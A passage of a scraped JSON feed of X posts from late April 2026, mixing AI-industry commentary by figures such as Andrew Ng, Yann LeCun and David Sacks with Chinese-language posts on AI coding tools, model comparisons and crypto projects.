"https://x.com/DavidSacks/status/2048821257534111863", + "published_at": "2026-04-27T17:47:07+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: x.com/a16z/status/1985413352…", + "url": "https://x.com/DavidSacks/status/2048813533136060459", + "published_at": "2026-04-27T17:16:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: The problem with most of the “AI Safety” crowd is that their solutions always favor more government centralization and control. In other words, they will bring about the Orwellian future they claim to oppose. From last year:\n https://x.com/a16z/status/1985413352349413542/video/1?s=48", + "url": "https://x.com/DavidSacks/status/2048813311668486300", + "published_at": "2026-04-27T17:15:33+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Concerning. As I’ve said many times before, the biggest risk of AI isn’t James Cameron’s The Terminator, it’s George Orwell’s 1984.", + "url": "https://x.com/DavidSacks/status/2048811495224390105", + "published_at": "2026-04-27T17:08:20+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: A completely local agent that lives right inside your browser.\n\nPowered by Gemma 4 E2B and WebGPU, it uses native tool calling to:\n\n🔍 Search browsing history\n📄 Read and summarize pages\n🔗 Manage tabs\n\n100% local. No servers needed!", + "url": "https://x.com/frxiaobei/status/2048805789788413984", + "published_at": "2026-04-27T16:45:39+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "Amazing", + "url": "https://x.com/frxiaobei/status/2048805385537306677", + "published_at": "2026-04-27T16:44:03+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: \"Every society at it's apex ultimately has built large public art to inspire the next generation\" @eladgil", + "url": "https://x.com/eladgil/status/2048803386938495412", + "published_at": "2026-04-27T16:36:07+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "OpenClaw 4.1x 后对于 GPT 的支持上了一个大台阶,之前只说不干的毛病基本没了。\n\n但是我修改了点 soul 文件里的内容后,他现在讲话总“卧槽”是怎么回事儿。\n\n像极了刚走向社会的二愣子。", + "url": "https://x.com/frxiaobei/status/2048802517237350599", + "published_at": "2026-04-27T16:32:39+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "OpenClaw 这么频繁的发版,我一开始以为他们掌握了什么自动化测试的黑科技,直到我最近做了两次升级。\n😤\n虽然 AI 时代讲究一个快,但好歹咱尊重下测试环节。", + "url": "https://x.com/frxiaobei/status/2048800504206282887", + "published_at": "2026-04-27T16:24:39+00:00", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to many other changes in how we operate. For example, some great engineers now play broader roles than just writing code. They are partly product managers, designers, sometimes marketers. Further, small teams who work in the same office, where they can communicate face-to-face, can move incredibly quickly.\n\nBecause we can now build fast, a greater fraction of time must be spent deciding what to build. To deal with this project-management bottleneck, some teams are pushing engineer:product manager (PM) some teams are pushing engineer:product manager (PM) ratios downward from, say, 8:1 to as low as 1:1. But we can do even better: If we have one PM who decides what to build and one engineer who builds it, the communication between them becomes a bottleneck. This is why the fastest-moving teams I see tend to have engineers who know how to do some product work (and, optionally, some PMs who know how to do some engineering work). When an engineer understands users and can make decisions on what to build and build it directly, they can execute incredibly quickly.\n\nI’ve seen engineers successfully expand their roles to including making product decisions, and PMs expand their roles to building software. The tech industry has more engineers than PMs, but both are promising paths. If you are an engineer, you’ll find it useful to learn some product management skills, and if you’re a PM, please learn to build!\n\nLooking beyond the product-management bottleneck, I also see bottlenecks in design, marketing, legal compliance, and much more. When we speed up coding 10x or 100x, everything else becomes slow in comparison. For example, some of my teams have built great features so quickly that the marketing organization was left scrambling to figure out how to communicate them to users — a marketing bottleneck. Or when a team can build software in a day that the legal department needs a week to review, that’s a legal compliance bottleneck. In this way, agentic coding isn’t just changing the workflow of software engineering, it’s also changing all the teams around it.\n\nWhen smaller, AI-enabled teams can get more done, generalists excel. Traditional companies need to pull together people from many specialties — engineering, product management, design, marketing, legal, etc. — to execute projects and create value. This has resulted in large teams of specialists who work together. But if a team of 2 persons is to get work done that require 5 different specialities, then some of those individuals must play roles outside a single speciality. In some small teams, individuals do have deep specializations. For example, one might be a great engineer and another a great PM. But they also understand the other key functions needed to move a project forward, and can jump into thinking through other kinds of problems as needed. Of course, proficiency with AI tools is a big help, since it helps us to think through problems that involve different roles.\n\nEven in a two-person team, to move fast, communication bottlenecks also must be minimized. This is why I value teams that work in the same location. Remote teams can perform well too, but the highest speed is achieved by having everyone in the room, able to communicate instantaneously to solve problems.\n\nThis post focuses on AI-native teams with around 2-10 persons, but not everything can be done by a small team. I'll address the coordination of larger teams in the future.\n\nI realize these shifts to job roles are tough to navigate for many people. At the same time, I am encouraged that individuals and small teams who are willing to learn the relevant skills are now able to get far more done than was possible before. This is the golden age of learning and building!\n\n[Original text: https://www.deeplearning.ai/the-batch/issue-349/ ]", + "url": "https://x.com/AndrewYNg/status/2048793852702757151", + "published_at": "2026-04-27T15:58:13+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: By canning the National Science Board with no stated justification, the administration continues the destruction of this country's scientific and technological base built up over 80 years. Supporters of this action live in a fantasy dystopia about how science operates.", + "url": "https://x.com/ylecun/status/2048779086168838610", + "published_at": "2026-04-27T14:59:33+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "最近想玩链游的可以看看 @RealGoOfficial 这个游戏\n\n他们刚刚拿到了 350w 美金融资,这个行情能融到这个数字算很不错了。苹果商店和谷歌商店现在都可以下载,玩法类似 Pokemon GO,出门走路到现实世界抓 Meme 宠物,然后收集、升级、融合、组队、社交。\n\n他们提出 Meme 3.0 的概念,想去做一些 Meme 相关的生态基建,现在和几个 Meme 的大 IP 都有合作,比如 Doge、Floki、Toshi 和 WIF 等等,之前和 @xhunt_ai 也有过合作。\n\n大概今年 Q2 会 TGE,有时间可以玩一玩,可以参加一下他们的忠诚度计划,玩游戏或交互都可以撸积分和代币。", + "url": "https://x.com/wolfyxbt/status/2048764088193569049", + "published_at": "2026-04-27T13:59:57+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", + "url": "https://x.com/JeffDean/status/2048759102390899142", + "published_at": "2026-04-27T13:40:08+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to the cloud era enterprise pains. I'm sure these issues would apply to all the other AI providers.\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1sspwz2/psa_anthropic_bans_organizations_without_warning/", + "url": "https://x.com/soumithchintala/status/2048756358820827564", + "published_at": "2026-04-27T13:29:14+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The 2020 US election was audited on a massive scale. Researchers examined audit results from 856 jurisdictions across 27 states, covering over 71 million votes. The audits found the net error rate in counting presidential votes was 0.007%. The median shift in any county's vote count was zero.", + "url": "https://x.com/ylecun/status/2048740712556933170", + "published_at": "2026-04-27T12:27:04+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "Image", + "url": "https://x.com/Stv_Lynn/status/2048713165232644251", + "published_at": "2026-04-27T10:37:36+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "Meta 对 Manus 的收购被中国发改委驳回。\n看来以后要么一开始就出海,要么就不出海。", + "url": "https://x.com/0xAA_Science/status/2048685380304871774", + "published_at": "2026-04-27T08:47:12+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "RT by @0xAA_Science: 用 @gmgnai 的 skill (获取链上数据) + @xapi_to xapi skill(社交搜索)组合玩玩,做了个异动的meme(异动的老币+新币+多链异动同名币+持续上升币),担心再次错过太空狗等信号~ 有 ai 真方便啊~", + "url": "https://x.com/0xAA_Science/status/2048666088733581805", + "published_at": "2026-04-27T07:30:32+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "我以前也会AI焦虑,我现在做的事情,AI以后一定都能做,甚至比我好\n\n现在我觉得,想那么多干嘛,我先用起来,玩起来,Token烧起来,做到是身边圈子里面AI用的做好的一批人就好了", + "url": "https://x.com/bozhou_ai/status/2048663377598452202", + "published_at": "2026-04-27T07:19:46+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 中文AI必关注12位高价值博主\n\nAI内容每天都在刷屏,但真正能帮你提效、避坑、落地的其实没几个。\n\n我挑了12位持续输出干货、实战经验丰富的中文博主,覆盖工具测评、Agent搭建、出海变现、Prompt工程、创意落地等方向,建议直接关注。\n\n1. 摸鱼巨匠 @SunNeverSetsX\nAI+Web3趋势观察者,擅长把前沿资讯浓缩成可落地的认知框架,宏观视野极强\n\n2. Rachel @Zesee\n前微软亚马逊产品人,现在深耕AI营销创业,分享产品开发实操和行业洞察,干货密度高\n\n3. 小将 @nftbanker\n欧洲GenAI大会主办方 + 最大华人AI出海社区创始人,副业创业和落地案例特别实在\n\n4. WaytoAGI @WaytoAGI\n中文AI知识库整理专家,像随身AI百科一样持续更新一手资讯和实战总结\n\n5. 汗青 HQ @hq4ai\n\nAI创意与AIGC艺术应用先锋,专注虚拟偶像、AI-IP创作和短视频灵感,技术与艺术结合得非常出色\n\n6. Mulight 沐光 @0xMulight\n专注AI工具深度测评 + 手机端高效工作流(Hermes WebUI等),自动化提效方案直接能用,实用党福音\n\n7. 阿西_出海 @axichuhai\nAI+LLM+Agent副业实战派,分享自媒体变现路径和真实落地打法\n\n8. 泊舟 @bozhou_ai\nVibe编码与Agent构建高手,系统Prompt和高效工作流拆解非常清晰\n\n9. berryxia @berryxia\nPrompt工程与AI工具设计专家,设计+编码+提示词三合一输出,质量顶尖\n\n10. CuiMao @CuiMao\n纯干货AI开发者,不接广告,专注深度学习实战分享\n\n11. GoSailGlobal @GoSailGlobal\n独立SaaS出海玩家,AI产品价值提炼和真实创业经验分享很接地气\n\n12. 范凯说 AI @fankaishuoai\nAI时代个人转型实战导师,提供可直接执行的框架和落地方法论", + "url": "https://x.com/bozhou_ai/status/2048640580004335669", + "published_at": "2026-04-27T05:49:10+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "狗B们在组团在 bags 分流太空狗,好恶心啊。\n下次它们买什么,咱们就去找个新盘子分,好吗?", + "url": "https://x.com/0xAA_Science/status/2048610365324623966", + "published_at": "2026-04-27T03:49:07+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "之前花了不少时间折腾 OpenClaw,想让 AI 在手机上也能帮我干活。结果发现 Token 消耗特别大,效果也没想象中好。后来一直是用 Claude Code写好 Skills 然后给到它来执行。\n\n一直缺的就是一个远程控制的入口。今天发现了 cc-connect 这个开源项目,刚好补上这块。\n\n它做的事很简单:把 AI 编码助手桥接到聊天软件里。支持的面很广:\n\nAI 端:Claude Code、Codex、Cursor、Gemini CLI、Kimi CLI 等 10 多种\n聊天端:飞书、钉钉、Telegram、Slack、Discord、企业微信、QQ 等 11 个平台\n\n功能也挺全:\n1. 不需要公网 IP,大部分平台直接连\n2. 支持语音、图片、文件发送\n3. 多项目同时跑,一个进程搞定\n4. 会话管理,能创建、切换、看历史\n5. 斜杠命令控制模型切换、权限、工作目录\n6. 定时任务,用自然语言就能设\n7. 带 Web 管理界面,配置不用碰命令行\n8. 支持不同用户隔离运行,安全性有保障\n\n简单说就是:出门在外,手机上打开飞书或 Telegram 就能让 Claude Code 继续干活。\n\nhttp://github.com/chenhg5/cc-connect", + "url": "https://x.com/bozhou_ai/status/2048603768250585231", + "published_at": "2026-04-27T03:22:54+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "不要骂我了,山寨季已经来过了\n\n$TRUMP 发币前后就是山寨季,就是本轮牛市山寨币流动性最充沛的时间段。\n\n觉得没来的,大部分是自己没赚到钱,我觉得要反省一下,不反省的话,下一轮山寨季也大概率賺不到钱。\n\n山寨币是赚钱容易而已,不是所有人都赚钱。", + "url": "https://x.com/wolfyxbt/status/2048581892333867398", + "published_at": "2026-04-27T01:55:58+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "人生第一次录播客,我们和cell老师一起聊聊中转站的那些事", + "url": "https://x.com/bozhou_ai/status/2048571760698949641", + "published_at": "2026-04-27T01:15:43+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "- @RiverdotInc 第五季创作者排名战正式打响🏆 \n赛季时间:4月22日 → 26年Q2结束📅 \n这一季的主题就是 RIVER 质押 + 合作活动,我也会继续在现场肝建设🛠️ \n另外,第四季空投会在结算完成后开放领取🪂,别忘了蹲 \n@River4fun 💧\n\n我也已经加入到第五季的战斗", + "url": "https://x.com/chuxiaeth/status/2048547844982976544", + "published_at": "2026-04-26T23:40:41+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 👉 Sur l’#IA, mon optimisme est prudent. Je reconnais les dangers de cette technologie, mais si on en freinait le développement en Europe, au nom du principe de précaution, son essor aurait lieu ailleurs. Il faut l'exploiter au mieux.\n\n👇 Discussion dans Le Monde", + "url": "https://x.com/ylecun/status/2048547683112046771", + "published_at": "2026-04-26T23:40:02+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "- @ferra_protocol 居然也上贵金属永续合约了🥇 \n现在是个项目都在往链上合约赛道挤🔗,蛋糕基本被分干净了 \n\n如果你是 SUI 链老玩家,又对贵金属合约有执念,可以多蹲蹲 #Ferra,这也是我捂了很久一直在撸的项目💰 \n\n交互链接: https://ferra.ag?code=tBYQfU0aq\n\n进去直接点 Perpetuals 就能开搞⚡️ #DEXonSui 🚀", + "url": "https://x.com/chuxiaeth/status/2048545974747070599", + "published_at": "2026-04-26T23:33:15+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", + "url": "https://x.com/DavidSacks/status/2048502978626113625", + "published_at": "2026-04-26T20:42:24+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: Yes, Obsidian Reader works for X articles and threads using the browser extension.\n\nWe're also making improvements to the share sheet in Obsidian 1.13 so you'll be able to save more easily directly within the X app.", + "url": "https://x.com/frxiaobei/status/2048487623250063516", + "published_at": "2026-04-26T19:41:23+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump has spent the better years of his second term treating allied governments like freeloading tenants who should be grateful he hasn’t changed the locks. \n\nThe result, predictably, is that they’ve stopped waiting for the lease to expire and started buying their own buildings.\nWhat’s happening now is qualitatively different from the grumbling of 2017-2019. Back then, European leaders still believed the relationship was cyclical – that America would eventually sober up and the old architecture would reassemble itself. \n\nThat belief is gone. Greenland changed everything. For ever. What replaced it are structural decisions: \n\nGerman rearmament on a scale not seen since before reunification, French-led European defence coordination that pointedly excludes Washington, South Korean quiet conversations about indigenous nuclear deterrence, Japanese defence spending hitting levels that would have been politically unthinkable five years ago.\n\nThe crucial dynamic is that these shifts generate their own momentum. A German arms industry rebuilt to supply a European force doesn’t get mothballed when the next US president calls. A generation of European defence planners trained to operate without American command integration doesn’t unlearn that. Trade relationships rerouted through new corridors don’t spontaneously return to their old paths just because someone in Washington eventually extends an olive branch.\n\nTrump appears to have understood American power as a static asset – something you could spend down for short-term leverage without diminishing the underlying account. \n\nWhat his allies understood, and what he didn’t, is that the asset was always relational. The moment they stopped believing in it, the balance sheet changed permanently.\nThe irony is almost classical. He wanted to make America’s allies pay more for American protection. Instead, he convinced them to stop needing it.", + "url": "https://x.com/ylecun/status/2048482084646240560", + "published_at": "2026-04-26T19:19:22+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Accurate", + "url": "https://x.com/DavidSacks/status/2048456433981591867", + "published_at": "2026-04-26T17:37:26+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: What if I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? \n\nHell no, right? \n\nBut the answer is actually \"hell yes\" because it's cars. \n\nYou probably got in one today and never even thought it could kill you. You normalized the risk so easily.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. \n\nIt's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and are totally fine with a technology that kills people every day?\n\nWelcome to the irrationality of the human mind!\n\nSuperintelligent machines can't come fast enough because the real problem is not intelligence in the world.\n\nIt's the utter lack of it.", + "url": "https://x.com/ylecun/status/2048433973177573559", + "published_at": "2026-04-26T16:08:11+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns.\n\nIn one post he calls President Trump the Antichrist.\n\nIn another he recommends buying guns in reaction to Trump’s DOJ exploring ways to ban firearm purchases from transgenders.\n\nIn one post he calls Trump a sociopathic mob boss and in another referred to him as a traitor with known connections to Putin, repeating a favorite leftwing Russian Hoax talking point.\n\nHe also attacks JD Vance for advocating an end to America’s funding the war in Ukraine and for his criticisms of the Pope. He seems pretty fixated on Ukraine more generally.\n\nHe also frequently interacts with Will Stancil’s Bluesky account, among others.", + "url": "https://x.com/DavidSacks/status/2048417712439689346", + "published_at": "2026-04-26T15:03:35+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "牛逼,卡神又出教程了\n\n4美分/天、KiteSim香港卡,免实名+独享虚拟号\n\n马上跟着教程申请一张!!!", + "url": "https://x.com/gkxspace/status/2048412096665145411", + "published_at": "2026-04-26T14:41:16+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 《Cursor官方资助的 AI & Web3博主》\n @cursor_ai 是顶级的AI项目方,最近对15位中文区的博主进行了资助,价值一万美元的Token,如果你是内行了解行情,就知道这个含金量还是很高的。\n\n 1. 杀破狼 @wolfyxbt 专注炒Memecoin、Vibe Coding与数据分析,风格幽默直率。\n 2. 0xAA @0xAA_Science 北大计算机博士,WTF Academy创始人。\n 3. 比特币橙子 @oragnes 比特币持有者、加密投资人,同时热衷 AI 与 Vibe Coding,自建了 AI Agents 工具平台 OwlClawHub。\n 4. 铁锤人 @lxfater AI博主,用AI协助创业,维护GitHub 3w star项目。\n 5. 雪踏乌云 @Pluvio9yte 大厂程序员,专注分享 Vibe Coding、AI 编程与出海实战干货。\n 6. 凡人小北 @frxiaobei 商业与管理咨询顾问、AI 战略顾问,长期在真实业务中实践 AIGC 落地。\n 7. Berryxia @berryxia 专注构建AI工具、系统Prompt,热爱设计与分享Prompt。\n 8. 奶昔🥤 @realNyarime Naixi Networks创始人,专注eSIM与奶昔论坛。\n 9. Ding @dingyi 产品设计师,运营 SaasPick、TopFeed 等多个独立产品,拥有15万粉丝。\n 10. CuiMao @CuiMao AI开发者博主,专注深度学习、NVIDIA与ComfyUI,建免费AI学习群。\n 11. Leo @runes_leo AI × Crypto 独立构建者,Runesgang 符文堂创始人,专注比特币生态与链上量化研究。\n 12. 泊舟 @bozhou_ai 2.1万粉AI博主,AI程序员&Vibe编码者,专注构建Agent与Prompt。\n 13. Jason Zhu @GoSailGlobal 独立开发者,专注 SaaS 出海与 AI 内容分享,并创建了 Agent Skills 聚合站。\n 14. 余温 @gkxspace AI博主,05年连续创业者,专注AI产品构建与商业化,项目营收7位数+。\n 15. Steven Lynn @Stv_Lynn FirstLabAI主持人与Crazy Saturday活动主办者。", + "url": "https://x.com/bozhou_ai/status/2048390603030032670", + "published_at": "2026-04-26T13:15:51+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "GPT 5.5已经开始说人话了,opus4.7完全用不了,还贵", + "url": "https://x.com/bozhou_ai/status/2048386685399142532", + "published_at": "2026-04-26T13:00:17+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: 1:我做了一张「项目」图 汇报用的 PPT 图之类的!\n\n2:但是甲方需要 4K 图。或者 PSD 图层!\n\n3:于是我试着在 GPT 里面让它给我 做PSD 分层文件。\nMD 居然给我做了!改给了我一个分层压缩包!\n\n4:里面的图片居然是 4K 尺寸的!\n\n5:所以我们能通过这个方法获得 GPT 的 4K 图片!", + "url": "https://x.com/frxiaobei/status/2048366332639674706", + "published_at": "2026-04-26T11:39:25+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in his debut ran 1:59:41 to become 2nd fastest alltime, while Jacob Kiplimo 🇺🇬 finished in 2:00:28.\n\nAll under the previous World Record.", + "url": "https://x.com/JeffDean/status/2048351736037826877", + "published_at": "2026-04-26T10:41:25+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: 一次体检,算不上全量啊。多次体检,基因组,衰老时钟,CGM,可穿戴,得全整起来给AI。直接看看这个 https://orviva.ai, Health memory for AI", + "url": "https://x.com/frxiaobei/status/2048319988826820941", + "published_at": "2026-04-26T08:35:15+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "给 auth2api 加了对 openai/codex 账号的授权支持,等审核完成就会合并。\n\n另外最近 xAPI 也在探索 AI 中转业务,有中转站和号商资源的可以联系我,我建个AI中转交流群,方便大家沟通。\n\nhttps://github.com/AmazingAng/auth2api", + "url": "https://x.com/0xAA_Science/status/2048296373569941533", + "published_at": "2026-04-26T07:01:25+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "感觉 gpt 5.5 的 plan 能力比 opus 4.7 要强。\n\nopus 总是吭哧吭哧搞个很复杂的方案,gpt 给的plan 更简单并能达到同样效果。", + "url": "https://x.com/0xAA_Science/status/2048254571622113742", + "published_at": "2026-04-26T04:15:19+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "嗨 @nikitabier @elonmusk\n\n你们两个,能不能快点解决这个问题,你们的检测机制,把我一堆活人朋友们都误封了,然后这些真正的机器人账号,我每一次发帖都会出现。\n\n我真的球球你们了,去追踪这几个关键词就可以了:男大、弟弟、同城、哥哥、万达广场、线下、主人、搭子、固炮、单男。", + "url": "https://x.com/wolfyxbt/status/2048250984644960630", + "published_at": "2026-04-26T04:01:04+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "川普的命真是硬啊,在白宫记者晚宴遭遇枪击,结果又平安无事!\n\n枪手 Cole Allen,来自加州,曾经被评为月度最佳教师。", + "url": "https://x.com/0xAA_Science/status/2048229814172275062", + "published_at": "2026-04-26T02:36:56+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "好久不见,宝子们,近来可好啊", + "url": "https://x.com/chuxiaeth/status/2048229604784308266", + "published_at": "2026-04-26T02:36:06+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "卧槽,川普又被枪击了 😱", + "url": "https://x.com/wolfyxbt/status/2048223317019316568", + "published_at": "2026-04-26T02:11:07+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to make sure that all of our industries do well. Crypto's a big industry.\"", + "url": "https://x.com/DavidSacks/status/2048111588930986354", + "published_at": "2026-04-25T18:47:09+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: github.com/stvlynn/quote-bud…", + "url": "https://x.com/Stv_Lynn/status/2048109932751560818", + "published_at": "2026-04-25T18:40:34+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: 3. 逆向了 Quote 的官方固件,成功实现了 USB 写入图像", + "url": "https://x.com/Stv_Lynn/status/2048109929203212615", + "published_at": "2026-04-25T18:40:33+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "Cursor 送的 10000 刀,我拿来做了什么\n\n昨天被 @cursor_ai 投喂了,于是决定好好记录一下与 Cursor 3 共创的全部过程。以下是第一天花掉 121 刀的记录\n\n1. 写了个主页\n想起来上一个主页还是去年拿 opus-3.7 写的,刚好通过 Cursor 用 GPT-5.5 重构\n(文案请忽略不代表最终效果)\n\n感觉吃上细糠了!", + "url": "https://x.com/Stv_Lynn/status/2048109919266852875", + "published_at": "2026-04-25T18:40:31+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "R to @gkxspace: agent.creao.ai/signup?ref=Ws…", + "url": "https://x.com/gkxspace/status/2048070713601376712", + "published_at": "2026-04-25T16:04:44+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "因为上帝造人的时候,是把生殖器设计给你们繁殖的,不是设计给你们进食的。", + "url": "https://x.com/wolfyxbt/status/2048056527731454048", + "published_at": "2026-04-25T15:08:21+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI\n\nFrom David Sacks\n\n\"Historically we only had two good exits for software businesses. One was IPO. The other was M&A. Then these big private equity shops came along and gave us a third potential exit. You would sell to them and then they would raise the capital based on one third equity and two third debt. So it was debt financed buyouts. \n\nIt is something that has been around in the non technology part of the economy for a long time but was a relatively new entrant in the world of technology. And the reason for that is if you have debt financed a purchase, you need to have very stable cash flows. \n\nBecause if you miss and you cant pay your interest on the debt, you will lose all your equity because the debt holders will foreclose. \n\nIt was belief for a long time that software did have predictable cash flows, at least for the mature businesses.\"", + "url": "https://x.com/DavidSacks/status/2048037985765949537", + "published_at": "2026-04-25T13:54:41+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "R to @gkxspace: x.com/gkxspace/status/204803…", + "url": "https://x.com/gkxspace/status/2048035672078844248", + "published_at": "2026-04-25T13:45:29+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "用 CREAO AI 一句话直接做出来的一个电商智能体,这个效果有点太离谱了。\n\n简直就是小白福音,还内嵌了平常会用到的各种API,不用折腾各种API KEY,支持云端一键部署,太强了。\n\n我的提示词:\n我需要一个智能体实现:电商新品从0到上架 